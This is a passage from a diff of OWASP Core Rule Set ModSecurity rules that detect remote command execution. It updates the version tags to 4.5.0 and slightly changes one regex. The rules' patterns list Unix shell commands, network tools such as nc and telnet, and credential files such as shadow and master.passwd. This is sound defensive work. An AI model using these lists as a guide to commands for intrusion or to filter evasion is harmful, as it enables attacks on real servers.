\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[23]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:c|a(?:ll|tch)[\s\x0b&\)<>\|]|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ "id:932239,\ phase:1,\ block,\ @@ -611,7 +611,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\) tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -631,13 +631,13 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-she tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \ +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \ "id:932232,\ phase:2,\ block,\ @@ -653,7 +653,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -673,11 +673,11 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx] tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]